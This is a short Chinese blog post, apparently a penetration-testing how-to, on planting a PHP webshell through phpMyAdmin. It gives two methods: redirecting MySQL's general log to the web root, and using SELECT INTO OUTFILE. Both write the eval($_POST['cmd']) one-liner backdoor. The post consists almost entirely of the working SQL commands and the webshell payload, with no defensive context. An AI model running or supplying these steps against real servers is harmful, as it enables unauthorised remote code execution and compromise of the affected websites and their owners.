phpmyadmin写马

发布于 2022-03-13  229 次阅读


法一:日志写马

  1. general log 指的是日志保存状态,ON代表开启 OFF代表关闭;
    general log file 指的是日志的保存路径。

    1. show variables like '%general%';#查看日志状态-->即可爆出日志的保存状态和保存路径
    2. SET GLOBAL general_log='on'
    3. SET GLOBAL general_log_file='根目录'#即设置日志保存的根目录的地址-->即典型你要写马的位置
    4. SELECT '<?php eval($_POST["cmd"]);?>'#执行语句-->即在日志文件中会直接生成

法二:

show variables like '%secure_file%';   查看是否有任意位置读写文件权限

①查select @@basedir;
②利用into outfile进行写
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/cc.php';#网站的根目录

子夜不哭
最后更新于 2022-03-13